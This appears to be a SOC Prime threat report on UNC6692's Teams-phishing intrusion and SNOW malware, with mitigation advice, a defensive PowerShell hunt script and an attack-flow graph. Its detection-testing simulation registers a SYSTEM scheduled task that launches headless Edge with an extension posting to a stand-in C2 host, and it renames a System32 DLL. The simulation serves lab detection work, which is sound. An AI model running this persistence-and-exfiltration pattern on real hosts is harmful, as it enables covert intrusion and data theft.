SOC Prime Bias: Critical

24 Apr 2026 16:35

UNC6692 Deploys Custom Malware Through Social Engineering

SOC Prime Team

Summary

UNC6692 carried out a multi-stage intrusion that started with a phishing link sent through Microsoft Teams, delivered a malicious AutoHotKey payload, and deployed a custom modular malware toolkit known as SNOW, including SNOWBELT, SNOWGLAZE, and SNOWBASIN. The operation also used a rogue Chromium browser extension, a Python-based tunneling utility, and a local HTTP backdoor to enable lateral movement, credential theft, and data exfiltration through cloud services. The campaign stood out for its effective abuse of legitimate cloud infrastructure and browser-based persistence mechanisms. Detecting this activity requires close monitoring of unusual browser extension behavior, scheduled tasks that launch Edge in headless mode, and suspicious access to cloud storage services.

Investigation

Google Threat Intelligence Group uncovered the campaign through analysis of Teams chat records, captured AutoHotKey scripts, scheduled task configurations, and network traffic involving AWS S3 and a Heroku-hosted WebSocket server. Malware analysis exposed the SNOW malware family, its internal components, communication patterns, and the attackers’ use of PsExec together with credential-dumping tools. Investigators also confirmed the theft of LSASS memory and Active Directory database files, which were exfiltrated through LimeWire.

Mitigation

Defenders should enforce allow-listing for browser extensions (an extension loaded through a --load-extension flag never passes through the store, so store-side review alone does not cover it), monitor for Microsoft Edge launched with headless or extension-loading flags such as --headless and --load-extension, and block access to unapproved AWS S3 buckets and Heroku domains. Enforcing multi-factor authentication for privileged accounts and alerting on PsExec execution (its PSEXESVC service and named pipe) and on handle access to LSASS can help limit credential theft and lateral movement. Scheduled tasks and Startup-folder shortcuts should also be reviewed regularly to identify unauthorized persistence.
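A host-side hunt for the persistence mechanisms described above, added here as an example (it is not code from the SOC Prime page or from the GTIG report): it enumerates scheduled tasks, Startup-folder shortcuts and already-running browser processes for msedge.exe or chrome.exe launched with --headless, --load-extension or --disable-extensions-except. The flag list, the inclusion of chrome.exe alongside Edge, and the output fields are this example's own assumptions; it expects an administrative PowerShell session on the host being checked.

```powershell
# Added hunt example (not from the SOC Prime page or the GTIG report).
# Assumptions: run as a local administrator; the three flags below are what we treat as
# suspicious for a browser started outside an interactive session.
$SuspiciousFlags = @('--headless', '--load-extension', '--disable-extensions-except')

function Test-SuspiciousBrowserCommand {
    param([string]$Executable, [string]$Arguments)
    if ([string]::IsNullOrEmpty($Executable)) { return $false }
    $exeName = [System.IO.Path]::GetFileName($Executable.Trim('"'))
    if ($exeName -notin @('msedge.exe', 'chrome.exe')) { return $false }
    foreach ($flag in $SuspiciousFlags) {
        if ($Arguments -and ($Arguments -match [regex]::Escape($flag))) { return $true }
    }
    return $false
}

$findings = New-Object System.Collections.Generic.List[object]

# 1. Scheduled tasks whose action launches a Chromium browser with suspicious flags
#    (the UNC6692 persistence described above). Non-exec actions have no Execute and are skipped.
Get-ScheduledTask | ForEach-Object {
    $task = $_
    foreach ($action in $task.Actions) {
        if (Test-SuspiciousBrowserCommand -Executable $action.Execute -Arguments $action.Arguments) {
            $findings.Add([pscustomobject]@{
                Source    = 'ScheduledTask'
                Name      = "$($task.TaskPath)$($task.TaskName)"
                Principal = $task.Principal.UserId
                Command   = "$($action.Execute) $($action.Arguments)"
            })
        }
    }
}

# 2. Startup-folder shortcuts (current user and all users) resolved through the shell COM object,
#    so the real target and arguments are inspected rather than the .lnk file name.
$shell = New-Object -ComObject WScript.Shell
$startupDirs = @(
    [Environment]::GetFolderPath('Startup'),
    [Environment]::GetFolderPath('CommonStartup')
)
Get-ChildItem -Path $startupDirs -Filter *.lnk -ErrorAction SilentlyContinue | ForEach-Object {
    $lnk = $shell.CreateShortcut($_.FullName)
    if (Test-SuspiciousBrowserCommand -Executable $lnk.TargetPath -Arguments $lnk.Arguments) {
        $findings.Add([pscustomobject]@{
            Source    = 'StartupShortcut'
            Name      = $_.FullName
            Principal = (Get-Acl -Path $_.FullName).Owner
            Command   = "$($lnk.TargetPath) $($lnk.Arguments)"
        })
    }
}

# 3. Browser processes already running with those flags, which also catches an extension
#    loaded by hand without any persistence yet.
Get-CimInstance Win32_Process -Filter "Name='msedge.exe' OR Name='chrome.exe'" | ForEach-Object {
    if (Test-SuspiciousBrowserCommand -Executable $_.ExecutablePath -Arguments $_.CommandLine) {
        $owner = Invoke-CimMethod -InputObject $_ -MethodName GetOwner
        $findings.Add([pscustomobject]@{
            Source    = 'RunningProcess'
            Name      = "PID $($_.ProcessId)"
            Principal = "$($owner.Domain)\$($owner.User)"
            Command   = $_.CommandLine
        })
    }
}

if ($findings.Count -eq 0) {
    Write-Host 'No headless or extension-loading browser launches found.'
} else {
    $findings | Format-Table -AutoSize -Wrap
}
```

Run it with the simulation script from the section below active and the scheduled task, the running headless Edge, or both should appear; a hit on a legitimate automation task (some test frameworks start headless browsers) is expected, so triage the task principal and the extension directory rather than the flag alone.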

Response

If any SNOW component is detected, isolate the affected system immediately, capture a memory image before terminating the suspicious Edge and AutoHotKey processes (the in-memory SNOW components and any LSASS access artifacts are lost once they exit), and preserve that image for LSASS-related forensic analysis. Block the known command-and-control domains and IP addresses, remove malicious browser extensions, and rotate credentials for privileged accounts; because Active Directory database files were exfiltrated in this campaign, treat every domain credential as compromised, including the krbtgt account, which must be reset twice. A full network-wide sweep should then be performed to identify additional compromised hosts, along with a review of scheduled tasks and startup items for persistence.

Attack Flow

    graph TB
        %% Class definitions
        classDef technique fill:#99ccff
        classDef tool fill:#cccccc
        classDef malware fill:#ffcc99
        classDef operator fill:#ff9900

        %% Technique nodes
        tech_phishing["<b>Technique</b> – <b>T1566.002 Phishing: Spearphishing Link via Microsoft Teams</b><br/><b>Description</b>: Adversary delivers a malicious link through Microsoft Teams to target users."]
        class tech_phishing technique
        tech_user_exec["<b>Technique</b> – <b>T1204.001 User Execution: Click malicious link</b><br/><b>Description</b>: Victim clicks the malicious link, triggering execution."]
        class tech_user_exec technique
        tech_ahk["<b>Technique</b> – <b>T1059.010 Command and Scripting Interpreter: AutoHotkey/AutoIT</b><br/><b>Description</b>: Executes AutoHotkey binary and script to run further code."]
        class tech_ahk technique
        tech_python["<b>Technique</b> – <b>T1059.006 Command and Scripting Interpreter: Python</b><br/><b>Description</b>: Runs Python loaders for additional modules."]
        class tech_python technique
        tech_ext["<b>Technique</b> – <b>T1176 Software Extensions: Install Chromium Extension</b><br/><b>Description</b>: Installs a malicious browser extension to maintain persistence."]
        class tech_ext technique
        tech_schedtask["<b>Technique</b> – <b>T1053.005 Scheduled Task: Launch Headless Edge</b><br/><b>Description</b>: Creates scheduled tasks to start Edge with the malicious extension."]
        class tech_schedtask technique
        tech_shortcut["<b>Technique</b> – <b>T1547.009 Shortcut Modification</b><br/><b>Description</b>: Places a shortcut in the Startup folder for automatic execution."]
        class tech_shortcut technique
        tech_ingress["<b>Technique</b> – <b>T1105 Ingress Tool Transfer</b><br/><b>Description</b>: Downloads additional payloads such as SNOWGLAZE and SNOWBASIN."]
        class tech_ingress technique
        tech_obfuscate["<b>Technique</b> – <b>T1027 Obfuscated Files or Information</b><br/><b>Description</b>: Encodes payloads with Base64 and encrypts with AES-GCM."]
        class tech_obfuscate technique
        tech_archive["<b>Technique</b> – <b>T1560 Archive Collected Data</b><br/><b>Description</b>: Encrypts and stages data before exfiltration."]
        class tech_archive technique
        tech_encchannel["<b>Technique</b> – <b>T1573.001 Encrypted Channel: Symmetric Cryptography</b><br/><b>Description</b>: Uses AES-GCM for encrypted communications."]
        class tech_encchannel technique
        tech_tunnel["<b>Technique</b> – <b>T1572 Protocol Tunneling</b><br/><b>Description</b>: Establishes a WebSocket tunnel to a Heroku command-and-control server."]
        class tech_tunnel technique
        tech_appproto["<b>Technique</b> – <b>T1071.001 Application Layer Protocol: WebSocket</b><br/><b>Description</b>: Communicates with C2 over WebSocket application-layer protocol."]
        class tech_appproto technique
        tech_proxy["<b>Technique</b> – <b>T1090 Proxy</b><br/><b>Description</b>: Utilizes the tunnel as a proxy to route traffic."]
        class tech_proxy technique
        tech_psexec["<b>Technique</b> – <b>T1021.002 SMB/Windows Admin Shares: PsExec</b><br/><b>Description</b>: Executes remote processes via SMB admin shares for lateral movement."]
        class tech_psexec technique
        tech_cred_dump["<b>Technique</b> – <b>T1003 OS Credential Dumping</b><br/><b>Description</b>: Extracts credentials from LSASS memory."]
        class tech_cred_dump technique
        tech_pass_hash["<b>Technique</b> – <b>T1550.002 Pass the Hash</b><br/><b>Description</b>: Uses captured NTLM hashes to authenticate to other systems."]
        class tech_pass_hash technique
        tech_rdp["<b>Technique</b> – <b>T1021.001 Remote Desktop Protocol</b><br/><b>Description</b>: Connects via RDP to backup server and domain controller."]
        class tech_rdp technique
        tech_exfil["<b>Technique</b> – <b>T1567.002 Exfiltration to Cloud Storage</b><br/><b>Description</b>: Uploads harvested AD database files to Amazon S3."]
        class tech_exfil technique

        %% Tool nodes
        tool_ahk_binary["<b>Tool</b> – <b>Name</b>: AutoHotkey binary<br/><b>Description</b>: Executes compiled AHK scripts."]
        class tool_ahk_binary tool
        tool_python_runtime["<b>Tool</b> – <b>Name</b>: Python interpreter<br/><b>Description</b>: Runs Python-based loaders."]
        class tool_python_runtime tool
        tool_edge_headless["<b>Tool</b> – <b>Name</b>: Microsoft Edge (headless)<br/><b>Description</b>: Browser used to execute malicious extension."]
        class tool_edge_headless tool
        tool_snowglaze["<b>Tool</b> – <b>Name</b>: SNOWGLAZE loader<br/><b>Description</b>: Downloads and launches additional modules."]
        class tool_snowglaze tool
        tool_snowbasin["<b>Tool</b> – <b>Name</b>: SNOWBASIN loader<br/><b>Description</b>: Secondary loader used after SNOWGLAZE."]
        class tool_snowbasin tool
        tool_snowbelt_ext["<b>Tool</b> – <b>Name</b>: SNOWBELT Chromium extension<br/><b>Description</b>: Provides persistence and data collection in the browser."]
        class tool_snowbelt_ext tool
        tool_psexec["<b>Tool</b> – <b>Name</b>: PsExec<br/><b>Description</b>: Executes processes on remote Windows hosts via admin shares."]
        class tool_psexec tool

        %% Malware nodes
        malware_snowglaze["<b>Malware</b> – <b>Name</b>: SNOWGLAZE<br/><b>Description</b>: Loader that creates WebSocket tunnel and encrypts traffic."]
        class malware_snowglaze malware
        malware_snowbasin["<b>Malware</b> – <b>Name</b>: SNOWBASIN<br/><b>Description</b>: Secondary payload that assists in data staging."]
        class malware_snowbasin malware
        malware_snowbelt["<b>Malware</b> – <b>Name</b>: SNOWBELT extension<br/><b>Description</b>: Chromium extension used for persistence and exfiltration."]
        class malware_snowbelt malware

        %% Attack flow connections
        tech_phishing -->|leads_to| tech_user_exec
        tech_user_exec -->|triggers| tech_ahk
        tech_ahk -->|uses| tool_ahk_binary
        tech_ahk -->|executes| tech_python
        tech_python -->|uses| tool_python_runtime
        tech_python -->|downloads| tool_snowglaze
        tech_python -->|downloads| tool_snowbasin
        tool_snowglaze -->|installs| malware_snowglaze
        tool_snowbasin -->|installs| malware_snowbasin
        malware_snowglaze -->|creates| tech_ext
        tech_ext -->|installs| tool_snowbelt_ext
        tool_snowbelt_ext -->|installs| malware_snowbelt
        tech_ext -->|enables| tech_schedtask
        tech_schedtask -->|launches| tool_edge_headless
        tech_ext -->|enables| tech_shortcut
        tech_shortcut -->|adds| op_shortcut_startup(("Startup shortcut"))
        class op_shortcut_startup operator
        tech_user_exec -->|downloads| tech_ingress
        tech_ingress -->|delivers| tech_obfuscate
        tech_obfuscate -->|prepares| tech_archive
        tech_archive -->|protects| tech_encchannel
        tech_encchannel -->|protects| tech_tunnel
        tech_tunnel -->|uses| tech_appproto
        tech_tunnel -->|acts_as| tech_proxy
        tech_proxy -->|routes| tech_psexec
        tech_psexec -->|uses| tool_psexec
        tool_psexec -->|executes| tech_cred_dump
        tech_cred_dump -->|provides| tech_pass_hash
        tech_pass_hash -->|enables| tech_rdp
        tech_rdp -->|connects_to| tech_exfil

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands:

    1. Goal: Establish persistent, stealthy execution of the Snowbelt browser‑based payload on the victim host.
    2. Method: Register a scheduled task that launches Microsoft Edge in headless mode with the malicious Snowbelt extension loaded from C:\Temp\Snowbelt via --load-extension. The extension's JavaScript contacts C2 and exfiltrates data.
    3. Cleanup Indicator: After the payload runs, the attacker removes CoreUIComponents.dll from the system DLL cache so that the Edge process no longer looks like a normal Edge instance; the process keeps running with the module absent, which satisfies the second clause of the rule.
  • Regression Test Script:

    # UNC6692 Simulation – creates malicious scheduled task and runs Edge without CoreUIComponents.dll
    # WARNING: run only in a disposable lab VM from an administrative PowerShell session.
    # Step 5 renames a file under System32; that needs ownership taken from TrustedInstaller first
    # (takeown.exe / icacls.exe) and will otherwise fail with Access Denied.
    # -------------------------------------------------------------------------
    # 1. Define variables
    #    ${Env:ProgramFiles(x86)} needs the braces because of the parentheses in the variable name.
    $edgePath   = "${Env:ProgramFiles(x86)}\Microsoft\Edge\Application\msedge.exe"
    if (-not (Test-Path $edgePath)) { $edgePath = "$Env:ProgramFiles\Microsoft\Edge\Application\msedge.exe" }
    $extPath    = "C:\Temp\Snowbelt"
    $taskName   = "SnowbeltEdgeTask"
    $arguments  = "--headless --load-extension=`"$extPath`""
    $taskUser   = "SYSTEM"
    
    # 2. Ensure extension folder exists (simulated payload)
    #    Manifest V3 with a service worker so current Edge builds still load the unpacked extension;
    #    the script only posts a fixed string, since a service worker has no document.cookie.
    New-Item -ItemType Directory -Force -Path $extPath | Out-Null
    Set-Content -Path "$extPath\manifest.json" -Value '{"name":"Snowbelt","version":"1.0","manifest_version":3,"background":{"service_worker":"snow.js"}}' -Encoding UTF8
    Set-Content -Path "$extPath\snow.js" -Value 'chrome.runtime.onInstalled.addListener(() => { fetch("http://malicious.c2/collect", {method:"POST", body:"simulated-collect"}).catch(() => {}); });' -Encoding UTF8
    
    # 3. Register the malicious scheduled task
    $action  = New-ScheduledTaskAction -Execute $edgePath -Argument $arguments
    $trigger = New-ScheduledTaskTrigger -AtLogOn
    Register-ScheduledTask -TaskName $taskName -Action $action -Trigger $trigger -User $taskUser -Force
    
    # 4. Start the task immediately to generate telemetry
    Start-ScheduledTask -TaskName $taskName
    Start-Sleep -Seconds 5
    
    # 5. Remove CoreUIComponents.dll from the running Edge process (simulated)
    #    Note: In a real environment this would involve DLL hijacking or process memory patching.
    #    Here we simply rename the file so an on-disk/module-list check misses it; renaming does
    #    not unload a copy that Edge has already mapped, so the loaded-module check in step 6 may
    #    still report it as present.
    $dllPath = "$Env:SystemRoot\System32\CoreUIComponents.dll"
    if (Test-Path $dllPath) {
        Rename-Item -Path $dllPath -NewName "CoreUIComponents.dll.bak" -Force
    }
    
    # 6. Verify that Edge is running and report whether the DLL is loaded
    $procs = Get-Process -Name "msedge" -ErrorAction SilentlyContinue
    if ($procs) {
        Write-Host "Edge running (PIDs: $($procs.Id -join ', ')) launched with the simulated extension."
        try {
            $loaded = $procs | ForEach-Object { $_.Modules } | Where-Object { $_.ModuleName -eq 'CoreUIComponents.dll' }
            Write-Host ("CoreUIComponents.dll loaded in Edge: {0}" -f [bool]$loaded)
        } catch {
            Write-Host "Could not enumerate Edge modules (task runs as SYSTEM): $($_.Exception.Message)"
        }
    } else {
        Write-Host "Edge did not start; check the task's Last Run Result with Get-ScheduledTaskInfo."
    }
  • Cleanup Commands:

    # Stop the headless Edge started by the task, then remove the task
    Get-Process -Name "msedge" -ErrorAction SilentlyContinue | Stop-Process -Force -ErrorAction SilentlyContinue
    Unregister-ScheduledTask -TaskName "SnowbeltEdgeTask" -Confirm:$false -ErrorAction SilentlyContinue
    
    # Restore CoreUIComponents.dll if it was renamed
    $dllPath = "$Env:SystemRoot\System32\CoreUIComponents.dll"
    $backup   = "$Env:SystemRoot\System32\CoreUIComponents.dll.bak"
    if (Test-Path $backup) {
        Rename-Item -Path $backup -NewName "CoreUIComponents.dll" -Force
    }
    
    # Delete simulated extension files
    Remove-Item -Path "C:\Temp\Snowbelt" -Recurse -Force -ErrorAction SilentlyContinue